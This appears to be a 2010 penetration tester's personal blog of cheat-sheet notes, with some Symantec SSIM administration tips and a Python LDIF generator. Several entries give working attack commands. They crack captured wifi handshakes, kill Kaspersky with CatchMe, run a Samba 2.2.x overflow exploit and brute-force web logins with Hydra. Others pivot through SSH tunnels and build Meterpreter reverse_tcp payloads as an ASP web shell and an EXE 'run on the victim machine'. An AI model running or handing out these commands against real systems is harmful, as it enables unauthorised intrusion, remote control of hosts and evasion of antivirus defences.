Thursday, April 29, 2010

Use OS X Airport for wireless sniffing

Scan for networks:
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en1 scan

Sniff:
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport sniff

Create a symbolic link to the binary so you can easily execute it from your path if you wish.

The sniff dumps a *.cap file in /tmp. Once you've captured enough IVs and/or a handshake, use aircrack-ng on the cap file.

Monday, April 26, 2010

Disabling Kaspersky via CatchMe.exe

Kaspersky Anti-Virus is a pain: Meterpreter cannot disable it via the "killav" command. Administrative privileges still do not give you enough permission because the antivirus nests itself into the kernel.


The following is destructive; read more about CatchMe before issuing the commands:

catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" [file]
reboot

or

attempt to remove catchme.exe from memory with: Darkspy, Seem, Icesword GUI

The above information was found here, in a nice Meterpreter cheatsheet:

Sunday, April 25, 2010

Samba 2.2.x Exploit

A nice oldie that worked for me:
http://www.milw0rm.com/exploits/7

From Nessus:
Samba <>

An attacker needs to be able to access at least one share to exploit this flaw.

In addition, it is reported that Samba contains a flaw related to the handling of .reg files that may allow a local user to overwrite arbitrary files.


Usage:
./samba_2.2.8_bufferoverflow.pl -tlinx86 -H [local_ip] -h[victim_ip]

Friday, April 23, 2010

THC-Hydra HTTP-POST-FORM bug

On BackTrack Final 4, there is a bug in Hydra that prevents you from brute-forcing HTTP POST/GET forms. See the following description:

To solve:

Download source:

Get patch:

Apply the patch:
$ cd [path_to_hydra_src] && patch -p1 < [patch_file]

$ ./configure
$ make
$ sudo make install

You may receive a libssh error, as I did. This was a bug in the pre-final release of BackTrack. To apply the libssh patch, download:


Patch again:
$ cd [path_to_hydra_src] && patch -p1 < [patch_file]

$ ./configure
$ make
$ sudo make install


Example command:
hydra -t2 -e ns -L ~/projects/offsec/users.txt -P ~/projects/offsec/passwords.txt -f 192.168.11.223 http-post-form "/flatfilelogin/login.php:username=^USER^&password=^PASS^&submit=Login:Incorrect" -V

Where /flatfilelogin/login.php is the form's POST-back action,
username is the ID of the username input field,
password is the ID of the password input field, and
Incorrect is the failure indicator displayed on a bad login. Note: check that this string is actually returned by the post-back page; otherwise Hydra will report every attempt as successful.
Note to self: if you are receiving false positives, check for other hidden POST form fields that also need to be included.

Symantec SIM - High Availability - Restoring Incidents

The following is not supported by Symantec. Modify at your own risk:

In the event of a catastrophic failure of an SSIM correlation device, we need to be able to restore the incidents on a secondary backup SSIM. A DB2 restore in the web console effectively restores the incidents; however, if you attempt to drill down into an incident to pull up additional information on specific events, it will still reference the archive on the failed SSIM. We need to be able to reference the new archive on the secondary SSIM.


Events stored in /eventarchive are regularly backed up to an external storage device. If the primary SSIM fails, these events are transferred to the secondary backup SSIM, so the filenames stored in /eventarchive will be identical on both.

To re-point the incidents to the new archive, a new unique archive ID needs to be generated, and the incidents need to point to the new archive ID. You cannot have two archives with the same ID even if they are on different correlation managers.

The incidents reference the event archive via a hex encoded value.

Issue following query as db2admin:

$ db2 connect to sesa
$ db2 -x "SELECT SESA_GUID FROM symcmgmt.symc_imr_associated_event_view"

Example output:
638a:20100318103824:700001

The first item before the colon, 638a, is the unique archive ID. It needs to be changed to the new archive ID of the secondary backup SSIM.

Thursday, April 22, 2010

SSH Tunneling

Using a machine as a pivot/proxy, we need to make a service on an unroutable remote machine routable. The following example tunnels port 445.

My IP: 192.168.10.88
Machine 1: 192.168.11.72 //We have access to this machine. Has route to machine 2
Machine 2: 10.2.2.50 //Unrouteable from my local machine

On Machine 1, create the tunnel mapping remote TCP port 445 to my machine's local TCP port 445.
$ ssh -l [local_username] -R [local_port]:[remote_ip]:[remote_port] [local_ip]
$ ssh -l liuser -R 445:10.2.2.50:445 192.168.10.88

Confirm with netstat -nat that the port is listening.

Commonly used for exploiting unrouteable services.

Symantec Security Information Manager (SSIM) LDAP Mods

Symantec does not recommend customizing the LDAP tree. It is not included in Symantec's Technical Support contract.

However, I find there are a slew of things you can customize that are nice features I wish Symantec had included: for example, automating updates to user lookup tables, auto-import of users, failover settings, etc. These attributes are all stored in the LDAP tree.

Mod at your own risk:

Connection information:
Port 636 (SSL)
Protocol LDAP v3
USERID=Administrator,ou=People,DC=[your_domain],O=SYMC_SES

LDAP search using objectClass=* as a filter, run locally on the SSIM:

$ ldapsearch -h localhost -Z -K /etc/symantec/ses/key.kdb -b "o=symc_ses" -D 'USERID=Administrator,ou=People,DC=[your_domain],O=SYMC_SES' -w [admin_password] "objectClass=*"


JXplorer is a nice tool for browsing the SSIM LDAP tree. You may see some fields storing XML (for example symcMetaData for the user lookup tables). These fields need to be base64 encoded prior to setting the attribute.

Modifying lookup tables, for example:

ldapsearch -h localhost -Z -K /etc/symantec/ses/key.kdb -b "cn=Lookup Tables,cn=Rule Engine,cn=SIM,ou=Administration,dc=[DOMAIN],o=symc_ses" -D 'USERID=Administrator,ou=People,DC=[DOMAIN],O=SYMC_SES' -w [PASSWORD] "dlmCaption=[TABLE_NAME]"

This is the ldif I am importing:

dn: orderedCimKeys=Symc_Setting.SettingID\=[TABLE_NAME],cn=Lookup Tables,cn=Rule Engine,cn=SIM,ou=Administration,dc=[DOMAIN],o=symc_ses
changetype: modify
replace: cisProperty
cisProperty:: JXR5cGVzLHRleHQsdGV4dCx0ZXh0DQolbmFtZXMsIlVzZXJuYW1lIiwiRmlyc3RuYW1lIiwiTGFz
 dG5hbWUiDQoNCiJzcG9uZ2Vib2IiLCJzcG9uZ2Vib2JmaXJzdG5hbWUiLCJzcG9uZ2Vib2JsYXN0
 bmFtZSINCiJwYXRyaWNrIiwicGF0cmlja2ZpcnN0IiwicGF0cmlja2xhc3QiDQoicGF0cmljazIi
 LCJwYXRyaWNrZmlyc3QyIiwicGF0cmlja2xhc3QyIg0KInBhdHJpY2szIiwicGF0cmlja2ZpcnN0
 MyIsInBhdHJpY2tsYXN0MyI=
-

To get the resulting table:

%types,text,text,text
%names,"Username","Firstname","Lastname"

"spongebob","spongebobfirstname","spongeboblastname"
"patrick","patrickfirst","patricklast"
"patrick2","patrickfirst2","patricklast2"
"patrick3","patrickfirst3","patricklast3"

You also need to modify the LDAP attribute symcSequenceRevision with an updated timestamp, in Zulu (UTC) time format. If you do not update it, the table will not be updated.
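As an added example (not from the post or from Symantec), this Python script builds the %types/%names table text, base64-encodes it for the double-colon cisProperty syntax, folds the LDIF at 76 columns and emits a symcSequenceRevision stamp in one modify entry. The GeneralizedTime YYYYMMDDhhmmssZ format for that attribute is an assumption (the post only says "Zulu time"), as are the [TABLE_NAME] and [DOMAIN] placeholders.

```python
import base64
from datetime import datetime, timezone

# Constructed sample: the same table the post's base64 cisProperty value decodes to.
COLUMNS = ("Username", "Firstname", "Lastname")
ROWS = [("spongebob", "spongebobfirstname", "spongeboblastname"), ("patrick", "patrickfirst", "patricklast"),
        ("patrick2", "patrickfirst2", "patricklast2"), ("patrick3", "patrickfirst3", "patricklast3")]

def _q(field):
    """Quote one field, doubling any embedded double quotes."""
    return '"' + str(field).replace('"', '""') + '"'

def build_lookup_table(columns, rows):
    """Render the table text SSIM keeps in cisProperty: a %types line, a quoted %names
    line, a blank line, then one quoted row per entry, CRLF-separated, no trailing newline."""
    lines = ["%types," + ",".join("text" for _ in columns),
             "%names," + ",".join(_q(c) for c in columns), ""]
    for row in rows:
        if len(row) != len(columns):
            raise ValueError(f"row {row!r} needs {len(columns)} fields")
        lines.append(",".join(_q(f) for f in row))
    return "\r\n".join(lines)

def encode_cis_property(table_text):
    """Base64 for the binary-safe 'cisProperty::' LDIF syntax (decode to inspect a live entry)."""
    return base64.b64encode(table_text.encode("utf-8")).decode("ascii")

def fold_ldif_line(line, width=76):
    """RFC 2849 folding: wrap at 76 columns; continuation lines start with one space."""
    parts, rest = [line[:width]], line[width:]
    while rest:
        parts.append(" " + rest[:width - 1])
        rest = rest[width - 1:]
    return "\n".join(parts)

def zulu_revision(epoch=None):
    """symcSequenceRevision value. Assumed format: LDAP GeneralizedTime in UTC
    (YYYYMMDDhhmmssZ); the post only says the stamp is in Zulu time."""
    dt = datetime.now(timezone.utc) if epoch is None else datetime.fromtimestamp(epoch, timezone.utc)
    return dt.strftime("%Y%m%d%H%M%SZ")

def lookup_table_ldif(table_name, domain, table_text, revision):
    """One LDIF modify entry that replaces the table and bumps the revision together."""
    dn = (f"orderedCimKeys=Symc_Setting.SettingID\\={table_name},cn=Lookup Tables,"
          f"cn=Rule Engine,cn=SIM,ou=Administration,dc={domain},o=symc_ses")
    lines = [fold_ldif_line("dn: " + dn), "changetype: modify", "replace: cisProperty",
             fold_ldif_line("cisProperty:: " + encode_cis_property(table_text)), "-",
             "replace: symcSequenceRevision", "symcSequenceRevision: " + revision, "-"]
    return "\n".join(lines) + "\n"

if __name__ == "__main__":  # write the output to a file and feed it to ldapmodify -f
    print(lookup_table_ldif("[TABLE_NAME]", "[DOMAIN]", build_lookup_table(COLUMNS, ROWS), zulu_revision()))
```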

SNMP Set Example command

The following command sets the sysContact.0 object to Novacoast:

$ snmpset -v2c -c private [target_machine] SNMPv2-MIB::sysContact.0 s Novacoast
SNMPv2-MIB::sysContact.0 = STRING: Novacoast

Re-query to check the set was successful:

$ snmpwalk -v2c -c private [target_machine] | grep sysContact
SNMPv2-MIB::sysContact.0 = STRING: Novacoast

Metasploit Meterpreter Evil ASP

ASP:
./msfpayload windows/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] R | msfencode -o evil_liuser.asp

$ msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST [localhost_ip]
msf > exploit

Execute evil_liuser.asp via the browser.

Metasploit Meterpreter Windows Executable Payload

Creating the payload executable:

./msfpayload windows/meterpreter/reverse_tcp LHOST=[localhost_ip] LPORT=[local_port] X > metyay.exe

$ msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST [localhost_ip]
msf > exploit

Run metyay.exe on the victim machine.